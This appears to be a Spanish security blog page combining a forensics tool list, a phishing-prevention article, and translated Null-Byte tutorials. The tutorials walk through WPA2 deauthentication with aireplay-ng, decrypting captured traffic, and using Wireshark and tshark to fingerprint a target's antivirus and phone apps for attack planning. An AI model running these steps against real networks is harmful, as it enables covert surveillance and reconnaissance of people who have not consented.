Google Maps Tile InvestigatorMagnet ForensicsTakes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context. Tool can be downloaded after filling out a form.
KaZAlyserSanderson ForensicsExtracts various data from the KaZaA application.
LiveContactsViewNirsoftView and export Windows Live Messenger contact details.
SkypeLogViewNirsoftView Skype calls and chats.

Miscellaneous

Below is the list of additional miscellaneous software and tools that we have utilized and found useful over the years.

SOFTWAREDEVELOPED BYDESCRIPTION
Agent RansackMythicsoftSearch multiple files using Boolean operators and Perl Regex.
Computer Forensic Reference Data SetsNISTCollated forensic images for training, practice and validation.
EvidenceMoverNuixCopies data between locations, with file comparison, verification, logging.
FastCopyShirouzu HiroakiSelf labeled “fastest” copy/delete Windows software. Can verify with SHA-1. etc.
File SignaturesGary KesslerTable of file signatures.
HexBrowserPeter FiskerstrandIdentifies over 100 file types by examining their signatures.
HashMyFilesNirsoftCalculate MD5 and SHA1 hashes.
MobaLiveCDMobatekRun Linux live CDs from their ISO image without having to boot to them.
Mouse JigglerArkane SystemsAutomatically moves mouse pointer stopping screen saver, hibernation etc…
Notepad++Notepad++Advanced Notepad replacement.
NSRLNISTHash sets of “known” (ignorable) files.
Quick HashTed TechnologyA Linus & Windows GUI for individual and recursive SHA1 hashing of files.
USB Write BlockerDSiEnables software write-blocking of USB ports.
VolixFH AachenApplication that simplifies the use of the Volatility Framework.
Windows Forensic EnvironmentTroy LarsonGuide by Brett Shavers to creating and working with a Windows boot CD.

For Reference

Below are some valuable resources and references that you might find useful when researching digital forensics.

REFERENCEDEVELOPED BYDESCRIPTION
HotSwapKazuyuki NakayamaSafely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area.
iPhone Backup BrowserRene DevichiView unencrypted backups of IPad, iPod and iPhones.
IEHistoryViewNirsoftExtracts recently visited Internet Explorer URLs.
LiveViewCERTAllows examiner to boot dd images in VMware.
Ubuntu GuideHow-To GeekGuide to using Ubuntu live disk to recover partitions, carve files, etc.
WhatsApp ForensicsZena ForensicsExtract WhatsApp messages from iOS and Android backups

While these tools are essential and considered the top tools in digital, computer, and mobile forensics our forensics experts also have many more tools that they use on a daily basis. Digital forensics and investigations usually involve a ran

Below are some valuable resources and references that you might find useful when researching digital forensics.

Jul 09

Artículo: Detección y prevención del Phishing.

Artículo originalmente publicado en: https://ciberseguridad.blog/todo-sobre-la-deteccion-y-prevencion-del-phishing/

La palabra “phishing” es similar a “pescar” debido a la analogía de usar cebo para intentar atrapar a las víctimas y recolectar información confidencial

Por información confidencial nos referimos a cualquier cosa que abarque desde su número de seguro social hasta contraseñas, número de cuenta bancaria, detalles de la tarjeta de crédito, número PIN, domicilio, cuentas en redes sociales, cumpleaños, apellido de soltera de la madre, etc.

Con el fin de utilizar esta información para realizar daños financieros, robo de identidad, obtener acceso ilegal a diferentes cuentas, chantaje, y un largo , etc…

¿Cómo funciona el Phishing?

Los atacantes utilizan diferentes métodos de engaño en las estrategias de phishing.

Por ejemplo , crearán mensajes y sitios web falsos, que imitan a los originales. Y con ello, intentarán atraernos para que entreguemos nuestra información personal. Nos pedirán responder, seguir un enlace incluido en un mensaje o descargar un archivo adjunto.

En primera instancia, la comunicación parece ser iniciada por una persona o empresa legítima. Los famosos ataques de phishing imitan, por no decir copian a la perfección mensajes de instituciones financieras/bancos en su mayoria , pero no siempre, agencias gubernamentales , minoristas y servicios en línea ( Amazon, eBay, PayPal … ), redes sociales ( Facebook … ) o incluso de un amigo o colega.

Para que el phishing parezca original , los atacantes incluyen fotos e información del sitio web original. Incluso pueden redirigirlo al sitio web de la empresa y recopilar los datos a través de una ventana emergente falsa. O puede ocurrir al revés: primero solicitan los datos personales y luego nos redirigen al sitio web real, lo que en muchos casos , nos hace no percatarnos. Otras veces, nos dicen que hemos sido blanco de una estafa y que necesitamos actualizar nuestra información con urgencia para mantener nuestra cuenta segura.

Todos estos trucos ( Y son una parte diminuta ) minimizarán las posibilidades de que nos demos cuenta de lo que sucedió a la hora del engaño.

Phishing Agencia Tributaria Hacienda

El phishing se ha convertido en una forma de propagar malware. Los atacantes remiten contenido malicioso o C&C a través de los archivos adjuntos o enlaces en los que nos intentan engañarnos para que hagamos clic en ellos.

Aunque el phishing se transmite principalmente por correo electrónico, también puede funcionar a través de otros medios. En los últimos años, y ahora más que nunca por la activación de la PSD2,  los ciberdelincuentes se han centrado en los ataques de phishing realizados a través de servicios de mensajería instantánea, SMS, redes sociales, mensajes directos en juegos y muchos otros.

El phishing es popular entre los ciberatacantes porque es más fácil engañar a alguien para que haga clic en un enlace o descargue archivos adjuntos que intentar entrar en las defensas de su sistema. Esto consigue muy bien su cometido. He empezado a leerme/estudiar el CISM de ISACA, y en las primeras página ya nos indica, que nuestra seguridad, es tan frágil, como el eslabón más frágil de la cadena, y es hay donde el phishing ataca directamente.

Funciona porque apelan a las emociones. Promete grandes ofertas o alerta de que podemos tener un problema con nuestras cuentas bancarias, o peor aún , uno de los enlaces que os indique,que trata sobre los ERTEs , jugando con el sufrimiento de no disponer temporalmente de trabajo.

Pero no todo es emoción, también es muy efectivo porque más del 50% de los usuarios usan las mismas contraseñas para diferentes cuentas, por no decir que usan la misma para todo. Esto facilita que los ciberdelincuentes tengan acceso a facilmente al todos nuestros recursos una vez se hacen con las credenciales de una victima.

Prevenir el Phishing

Más alla de indicar los tipos de Phishing o similar, me gustaria centrarme en como prevenir y detectar el mismo, teniendo en cuenta el notable incremento de casos que estamos sufriendo debido a la situación de Pandemia con el COVID19 , en el que la gran mayoria de los trabajadores se encuentran trabajando desde casa (Si su puesto lo permite)

1. Detalles del emisor del email

Lo primero que debe verificar: la dirección de correo electrónico del remitente.

  • Mira el encabezado del correo electrónico. ¿La dirección de correo electrónico del remitente coincide con el nombre y el dominio?

La suplantación del nombre para mostrar de un correo electrónico, para que parezca ser de una marca o persona concreta, es una de las tácticas de phishing más básicas.

Un ejemplo: un correo electrónico de Amazon que proviene de “noreply@amazon.com” es legítimo. Pero un correo electrónico que parece ser de alguien en Amazon pero que se envió desde un dominio diferente, como el correo electrónico en la imagen a continuación, ciertamente no es de Amazon.

2. Contenido del mensaje

Primera Pista : Nos piden que enviemos o que verifiquemos la información personal por correo electrónico.

  • Nos están pidiendo información que el supuesto remitente ya debería tener.
Phishing Netflix Actualizar datos

Segunda Pista: Es probable que jueguen con nuestras emociones o urgencia. En este caso, que pasaria si en casa, ahora que estamos confinados nos quitasen nuestras suscripciones , Movistar+ , Disney+ , Netflix …

Como regla general, sospecha de cualquier correo que tenga solicitudes urgentes ( por ejemplo, “responda en dos días, de lo contrario perderá su cuenta” ), noticias, ofertas, ofertas de regalos o cupones emocionantes o perturbadores ( especialmente en días festivos o eventos importantes, como el black friday o  navidad ).

Tercera Pista: Afirman que hubo algún tipo de problema con nuestra compra o entrega reciente y nos piden que reenviemos información personal o simplemente hagamos clic en un enlace para resolverlo.

Los bancos o los representantes legítimos de comercio electrónico nunca nos pedirán que hagamos eso, ya que no es un método seguro para transmitir dicha información.

Cuarta Pista : Afirman ser de una agencia que aplica la normativa/ley.

Nunca usan el correo electrónico como forma de contacto.

Quinta Pista : Nos piden que llamemos a un número y demos nuestros datos personales por teléfono.

Si este es el caso, busque la correspondencia oficial de la compañía, buscalos en internet y usa el número de teléfono que nos proporcionen para verificarlo en caso de ser cierto.

3. Forma del mensaje / email

Primera regla: Ten cuidado con los enlaces falsos o engañosos.

Pasa el ratón sobre los enlaces en el mensaje de correo electrónico para verificarlos ANTES de hacer clic en ellos. Las URLs pueden parecer válidas a primera vista, pero usan una variación en la ortografía o en un dominio diferente (.co en lugar de .com, o similar). Gracias a los nuevos dominios genéricos de nivel de tema que se introdujeron en 2014, los spammers y los phishers obtuvieron nuevas herramientas para sus campañas. ( Un ejemplo, nuestro querido .blog 😉 )

Otras estafas de phishing usan JavaScript para colocar una imagen de una URL legítima sobre la barra de direcciones de un navegador. La URL revelada al pasar el mouse sobre un enlace también se puede cambiar con Java.

Segunda regla: Busca enlaces de direcciones IP o acortadores de URL.

Pueden coger una URL larga, acortarla utilizando servicios como bit.ly y redirigirla al destino deseado. Es difícil descubrir qué hay al otro lado de ese enlace, por lo que podríamos caer en una trampa. Siempre es mejor prevenir que curar.

En algunos casos tambien, nos encontramos con dominios distorsionados  deliberadamente en el correo electrónico, agregando espacios o caracteres adicionales, junto con instrucciones sobre cómo usarlo (“Elimine todos los caracteres / espacios adicionales y cópielos en la barra de direcciones”) con el fin de intentar dar de lado a los sistemas de seguridad.

La mejor opción, probar en un pequeño “sandbox” la url para ver cómo se veria , os recomiendo este.

Tercera Regla: Ten cuidado con los errores tipográficos o de ortografía. Esto solía ser la norma, pero ya no es un imperativo, cada vez prestan más atención en esto ( Salvo en las herencias de Ganha 😉 )

Cuarta Regla: Ten cuidado con los diseños de “aspecto aficionado”. Y aclaro un poco más, imágenes que no coinciden con el fondo o se ven formateadas para adaptarse al estilo del correo electrónico. Imagenes de almacenes de fotografías. Fotos o logotipos subidos y de baja resolución o mala calidad …

Quinta Regla: Cuidado con las firmas que faltan. La falta de detalles sobre el remitente o cómo comunicarse con la empresa apunta a una dirección de phishing. Una empresa legítima siempre proporcionará dicha información sin dudarlo.

4. Ficheros adjuntos

Estate atento a los archivos adjuntos.

En los Phishing se suelen adjuntar “todo tipo de archivos”, como PDFs o DOCs, que contienen enlaces o macros, ya nos hablo de esto el gran Rafa.Pedrero con Emotet y su vector de inicio . Otras veces, pueden hacer que nuestro navegador se bloquee al instalar malware … infinitud de casuristicas cambiantes con el tiempo, pero que siempre suelen iniciar con un fichero adjunto.

5. Enlaces externos

Supongamos que ya hemos pinchado en un enlace de un correo electrónico sospechoso. ¿ Es correcto el dominio ? No olvides que el enlace puede parecer idéntico, pero puede usar una variación en la ortografía o el dominio.

Antes de enviar cualquier información a ese sitio web, asegúrate de estar conectado a un sitio web seguro. Puedes verificarlo fácilmente mirando el enlace: ¿comienza con “https” o “http”? La “s” adicional significará que el sitio web tiene SSL. SSL es la abreviatura de Secure Sockets Layer y es un método para garantizar que los datos enviados y recibidos estén encriptados. Los sitios web más legítimos y seguros tendrán un certificado SSL válido instalado. Aunque esta norma, esta perdiendo mucha fuerza con el tiempo. Hace un tiempo, disponer de un certificado, suponía un desembolso de dinero que no todo el mundo podía realizar, pero ya vemos cómo el malware y el phishing esta empezando a usa protocolos seguros.

Otra forma de verificar eso es mirar a la izquierda de la dirección web: ¿hay un ícono de un candado cerrado? ¿O la dirección está resaltada en verde? Esto indicará que estamos visitando un sitio encriptado y que los datos transferidos están seguros. Google Chrome ya marcarca los sitios sin https como inseguros, por lo que debería ser fácil detectarlos.

Marca web con HTTPS

Tus empleados son tu última línea de defensa

Las organizaciones pueden mitigar el riesgo de suplantación de identidad ( phishing ) con medios tecnológicos, como filtros de spam, pero estos han demostrado ser poco confiables , o al menos antes pasaba con tecnologías pocas maduras ( Os recomiendo ver este post )

Los correos electrónicos maliciosos siempre se enviarán de forma regular, y cuando eso suceda, lo único que evitará que nuestra organización sufra una violación es la capacidad de nuestros empleados para detectar la naturaleza fraudulenta y responder de manera adecuada.

Los cursos de sensibilización del personal ante el phishing, ayuda a los empleados a hacer exactamente eso, así como a explicar qué sucede cuando las personas son víctimas y cómo pueden mitigar la amenaza de un ataque.

La única forma, de paliar los ataques de phising es concienciar al empleado. El resto de tecnologías nos ayuda a reducir muchisimo la recepción de estos, como si fuese un embudo, pero el punto final, es el empleado.

Abr 14

Laboratorio: Cómo identificar el software antivirus instalado en una PC con Windows. #Null-Byte

Artículo publicado en: https://null-byte.wonderhowto.com/how-to/hacking-windows-10-identify-antivirus-software-installed-windows-pc-0198775/

Determinar el software antivirus y cortafuegos instalado en una computadora con Windows es crucial para que un atacante se prepare para crear un stager o carga útil específica. Con la inspección encubierta de paquetes profundos, esa información se identifica fácilmente.

Este ataque supone que la contraseña de Wi-Fi para la red de destino ya se conoce . Con la contraseña, un atacante puede observar los datos que atraviesan la red y enumerar el software de seguridad instalado. Las soluciones populares de antivirus y firewall se pueden identificar fácilmente cuando se filtra el tráfico web benigno.

Aprenderemos cómo capturar y descifrar el tráfico de Wi-Fi sin autenticar el enrutador de destino, y realizaremos una inspección de paquetes para descubrir los tipos de aplicaciones de seguridad de terceros instaladas en el sistema operativo.

Paso 1. Capture el tráfico de Wi-Fi

Para comenzar en Kali, use el comando airmon-ng para detener todos los procesos que se ejecutan en segundo plano y que pueden interferir con la tarjeta inalámbrica.

~# airmon-ng check kill

Killing these processes:

  PID Name
 2891 wpa_supplicant

Habilite el modo de monitor en el adaptador Alfa (u otro adaptador inalámbrico ) con el comando airmon-ng start wlan0 .

~# airmon-ng start wlan0

PHY Interface   Driver      Chipset

phy2    wlan0       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

        (mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
        (mac80211 station mode vif disabled for [phy2]wlan0)

Luego, realice una exploración inicial de airodump-ng para enumerar las redes Wi-Fi en el área circundante.

~# airodump-ng wlan0mon

 CH  6 ][ Elapsed: 36 s ][ 2020-04-06 20:45

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -19       13        6    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Cuando se haya identificado el enrutador, presione Control-C para detener el escaneo. Realice una captura de paquetes dirigida contra el enrutador Wi-Fi incluyendo las opciones –channel , –write , –bssid y –essid .

~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon

 CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -20 100     8308     1895    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Aireply-ng des autenticará los dispositivos conectados al enrutador. Este comando es necesario para capturar los datos del protocolo de enlace WPA2. Los paquetes capturados solo se pueden descifrar con un protocolo de enlace válido.

Abra una nueva terminal y use el siguiente comando aireplay-ng para enviar tres paquetes “deauth” al enrutador, forzando a los usuarios autenticados a reconectarse.

~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon

05:12:46  Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]

Un ataque exitoso producirá la notificación “WPA handshake” en la esquina superior derecha de la terminal airodump-ng .

CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -20 100     8308     1895    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

En este punto, la ventana airodump-ng debería continuar capturando paquetes durante el mayor tiempo posible (es decir, muchas horas). A medida que pasa el tiempo, el software de seguridad en la computadora con Windows 10 objetivo intentará actualizar periódicamente la aplicación y las bases de datos de definición de virus. Estas consultas web son valiosas para un hacker con acceso a la red que se prepara para montar un ataque dirigido.

Paso 2. Descifrar el PCAP

Airdecap-ng es una herramienta de descifrado de captura de paquetes y parte de la suite Aircrack-ng.

~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap

Total number of stations seen            8
Total number of packets read         32310
Total number of WEP data packets         0
Total number of WPA data packets      4555
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets      3435
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0

Airdecap-ng usará el ESSID de Wi-Fi (-e) y la contraseña (-p) para descifrar y filtrar los paquetes que pertenecen a la red. En el ejemplo anterior, podemos ver 3435 paquetes descifrados WPA. Airdecap-ng creará un archivo llamado “capture-01-dec.cap” en el directorio actual.

Después de descifrar el PCAP, importe el nuevo archivo capture-01-dec.cap a Wireshark .

Paso 3. Busque el software antivirus (Avast)

Avast es una de las soluciones de software antivirales más populares del mundo.

Los dominios conocidos de Avast incluyen avast.com y avcdn.net, su red principal de distribución de contenido (CDN). Diariamente, estos dominios se utilizan para obtener bases de datos de virus y actualizaciones de software, así como enviar información de telemetría. Estos dominios se pueden filtrar en Wireshark con el siguiente filtro de visualización.

ip.host ~ "(?i)(avast|avcdn)\.*"

Se pueden agregar muchos dominios antivirus al filtro y separarlos mediante barras verticales (|).

Los resultados anteriores son una fuerte indicación de que la computadora está utilizando el software antivirus Avast. Los datos se pueden inspeccionar más a fondo para identificar las cadenas de agente de usuario comúnmente utilizadas por este proveedor de antivirus.

http.user_agent ~ "(?i)avast*"

Esta secuencia HTTP particular invocó una solicitud POST y entregó algunos datos sin cifrar a un servidor Avast. Como podemos ver, la solicitud se originó en la computadora con Windows 10 con un agente de usuario de Avast.

El cuerpo de la secuencia HTTP contiene algunos datos no cifrados relacionados con el dispositivo de destino. El tipo de CPU, el nombre de host de Windows 10 y la arquitectura de la placa base, así como la versión de Avast y los ajustes de configuración, se pueden descubrir desde una sola secuencia HTTP.

POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:

GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041

Estos datos son muy valiosos para un atacante en la red, ya que les permite crear una carga específica para ese usuario y sistema operativo.

Además de Wireshark, tshark y grep pueden imprimir y filtrar fácilmente las solicitudes de DNS, respectivamente, en la salida estándar. Agregue sort -u al comando para mostrar solo dominios únicos (es decir, sin duplicados).

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast\|avcdn" | sort -u

b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com

Paso 4. Búsqueda de software de firewall (Comodo)

Comodo Firewall es una solución de firewall popular diseñada para monitorear el tráfico entrante y saliente para identificar amenazas y prevenir ataques.

Su configuración del servidor DNS hace que sea difícil para los atacantes de la red a las aplicaciones instaladas enumerar y los sitios web visitados. Aún así, el software de Comodo ocasionalmente verificará si hay actualizaciones de software que le brinden al atacante toda la información que necesitan.

ip.host ~ "(?i)(comodo)\.*"

Para ver los dominios consultados en la salida estándar, examine el PCAP con tshark y filtre las solicitudes de DNS.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name

Es probable que este comando produzca una salida grande que contenga miles de dominios, direcciones IP y entradas duplicadas. Agregue los comandos sort y uniq para contar los servidores más consultados.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c

      2 218.0.101.95.in-addr.arpa
     72 22.70.154.156.in-addr.arpa
     14 22.71.154.156.in-addr.arpa
      1 download.comodo.com
      1 ncc.avast.com
      1 su.ff.avast.com
      2 v10.vortex-win.data.microsoft.com
      1 wireshark.org

Observe que la dirección 22.70.154.156.in-addr.arpa aparece 72 veces en el PCAP. Una búsqueda rápida y búsqueda de IP sugiere que 156.154.70.22 ha sido un servidor DNS de Comodo durante muchos años. Si bien esto no significa definitivamente que el objetivo tenga instalado el software Comodo, sugeriría que son conscientes de la seguridad.

Pensamientos finales…

Este artículo cubre solo unos pocos filtros de pantalla Wireshark . Hay muchos filtros HTTP , IP y DNS que ayudarían a un pirata informático mientras recopila información sobre el objetivo.

Con una lista completa de software antivirus popular , un atacante generalmente podrá decir con certeza si una máquina Windows objetivo tiene instalado un software de seguridad. Lo que da más miedo es que la enumeración de software se logra sin conectarse a la red Wi-Fi o sin necesidad de acceso físico a la computadora.

Abr 13

Artículo: Espiar el tráfico desde un teléfono inteligente con Wireshark.

Interesante artículo sobre cómo seguir las comunicaciones de nuestro teléfono móvil con la aplicación #Wireshark.

Enlace original: https://null-byte.wonderhowto.com/how-to/spy-traffic-from-smartphone-with-wireshark-0198549/

Traducción:

Entonces, ¿quieres saber qué tráfico está realizando tu teléfono? Si está en la misma red Wi-Fi, es tan simple como abrir Wireshark y configurar algunas configuraciones. Utilizaremos la herramienta para descifrar el tráfico de red WPA2 para poder espiar qué aplicaciones ejecuta un teléfono en tiempo real.

Si bien usar una red encriptada es mejor que usar una abierta, la ventaja desaparece si el atacante está en la misma red. Si alguien más conoce la contraseña de la red Wi-Fi que está utilizando, es fácil ver lo que está haciendo en ese momento usando Wireshark. Puede permitir que un atacante cree una lista de todas las aplicaciones que se ejecutan en el dispositivo al que se dirige y concentrarse en las aplicaciones que podrían ser vulnerables.

Descifrar paquetes cifrados

Cuando usa una red Wi-Fi que usa encriptación WPA2, la seguridad de su sesión se basa en dos cosas. La primera es la contraseña que se usa para generar un número mucho más largo, una PSK o una clave previamente compartida. El segundo es el apretón de manos en sí, que tiene que suceder para establecer una conexión. Si un atacante tiene el PSK en la red Wi-Fi y observa que te unes a la red o te desconecta por un momento, puede descifrar tu tráfico de Wi-Fi para ver lo que estás haciendo.

El contenido de los sitios web HTTPS no podrá verse, pero cualquier sitio web HTTP simple que visite o cualquier aplicación insegura de solicitudes HTTP en su teléfono está a la vista. Puede que esto no parezca un gran problema, pero en solo 60 segundos, es fácil aprender mucho sobre el tipo de dispositivo que estamos monitoreando y qué se está ejecutando exactamente en él. Además, las solicitudes de DNS para resolver los dominios con los que las aplicaciones necesitan hablar para trabajar son fáciles de ver, identificando qué aplicaciones y servicios están activos.

Cómo funciona

Para llevar a cabo este ataque, se deben cumplir algunas condiciones. Primero, necesitamos la contraseña, debemos estar cerca de la víctima para poder registrar el tráfico, y debemos poder expulsar el dispositivo objetivo de la red o esperar a que se reconecte. Abriremos Wireshark y accederemos al menú para descifrar los paquetes de Wi-Fi, agregaremos el PSK para habilitar el descifrado y esperaremos los paquetes EAPOL del dispositivo de destino que se conecta a la red.

Para tener una idea de lo que está haciendo el dispositivo objetivo, utilizaremos filtros de captura para resaltar los paquetes DNS y HTTP que estamos buscando. Para ver una lista completa de todos los dominios que el dispositivo ha resuelto, también podemos ver un resumen de los dominios resueltos una vez completada la captura. Podemos usar esta información para separar fácilmente qué servicios se están ejecutando, incluso si solo se ejecutan en segundo plano y la aplicación no se ha ejecutado en bastante tiempo.

Lo que necesitarás

Para hacer esto, necesitará una tarjeta adaptadora de red inalámbrica capaz de modo de monitor inalámbrico. Puede consultar nuestras guías para seleccionar una que sea compatible con Kali y que admita el modo de monitor.

A continuación, necesitará un teléfono inteligente iOS o Android conectado a la red Wi-Fi que está monitoreando. Puede practicar esto en una red Wi-Fi abierta para ver lo que se supone que debe ver, ya que a veces el descifrado puede no funcionar la primera vez. También necesitará saber la contraseña y el nombre de red de la red Wi-Fi que desea monitorear. Esto le permitirá calcular la clave previamente compartida, lo que nos permitirá descifrar el tráfico en tiempo real.

Paso 1. Descargue Wireshark y conéctese a la red Wi-Fi

Descargue e instale Wireshark si aún no está instalado, y conéctese a la red Wi-Fi en la que se encuentra su destino. Si planea usar un PSK en lugar de una clave de red, debe calcularlo utilizando la herramienta Wireshark antes de hacerlo, ya que es posible que no pueda acceder a Internet durante la captura, dependiendo de su tarjeta.

Una vez que haya descargado Wireshark, ábralo y luego eche un vistazo a sus interfaces de red. Antes de comenzar a capturar, necesitaremos configurar algunas cosas para asegurarnos de que la tarjeta está capturando en el modo correcto.

Paso 2.Configure Wireshark para capturar

En la opción de menú Wireshark, haga clic en el menú “Opciones de captura” en forma de engranaje.

Eso abrirá la ventana de Interfaces de captura , como se ve a continuación.

Paso 3.Comience la captura y escaneo en red para paquetes EAPOL

Si no está conectado a la red en la que se encuentra su destino, no podrá ver ningún paquete porque podría estar en algún otro canal aleatorio. Wireshark no puede cambiar realmente el canal en el que está conectado el adaptador de red inalámbrico, por lo que si no obtiene nada, esa podría ser la razón.

Paso 4.Descifrar el tráfico con la red PSK

Ahora que tenemos apretones de manos, podemos descifrar la conversación desde este punto en adelante. Para hacerlo, necesitaremos agregar la contraseña de red o PSK. Vaya al menú desplegable “Wireshark” y seleccione la opción “Preferencias”. Una vez seleccionado, haga clic en “Protocolos”.

En Protocolos, seleccione “IEEE 802.11” y luego haga clic en “Habilitar descifrado”. Para agregar la clave de red, haga clic en “Editar” junto a “Claves de descifrado” para abrir la ventana para agregar contraseñas y PSK.

Seleccione “wpa-psk” en el menú y luego pegue su clave. Presiona Tabulador , luego guarda haciendo clic en “Aceptar”.

Una vez que esto se haya completado, haga clic en “Aceptar” en el menú Preferencias , y Wireshark debería volver a escanear todos los paquetes capturados e intentar descifrarlos. Esto puede no funcionar por una variedad de razones. Pude lograr que funcionara la mayor parte del tiempo asegurándome de tener un buen apretón de manos (EAPOL) y cambiando entre usar una contraseña de red y un PSK. Si funciona, podemos pasar al paso de analizar el tráfico para seleccionar las aplicaciones en uso.

Paso 5.Escanee en busca de paquetes DNS y HTTP

Ahora que hemos eliminado la protección alrededor del tráfico, Wireshark puede descifrarlos y decirnos qué están haciendo los dispositivos en esta red Wi-Fi para los que tenemos apretones de manos en tiempo real.

1 solicitudes de DNS

Para ver paquetes interesantes, comenzaremos con las solicitudes de DNS. Las solicitudes de DNS son cómo las aplicaciones se aseguran de que las direcciones IP a las que deben conectarse no hayan cambiado. Serán dirigidos a nombres de dominio que generalmente tienen el nombre de la aplicación, lo que hace que sea trivial ver qué aplicación se está ejecutando en el teléfono iPhone o Android y hacer las solicitudes.

Para ver estas solicitudes, utilizaremos dos filtros de captura, dns y http , que nos mostrarán las huellas digitales más obvias que deja una aplicación a través de Wi-Fi. Primero, escriba dns en la barra de filtro de captura y presione Entrar . Si esto no funciona, intente cambiar entre un PSK y una contraseña varias veces. Es una mierda, pero a veces comenzará a funcionar.

Si su objetivo se siente solo, puede ver la respuesta a continuación. Tinder llama al dominio Tindersparks.com, así como a muchos otros servicios. Esta solicitud es una de las más obvias.

Si bien usar Signal es una buena idea, usarlo con una VPN es una mejor idea. ¿La razón? Incluso abrir Signal crea el intercambio a continuación, identificando claramente que el usuario se está comunicando con un mensajero cifrado.

Intentar encontrar esa canción que suena con Shazam deja la siguiente huella digital.

Abrir la aplicación para llamar a un Uber crea las solicitudes que ves a continuación.

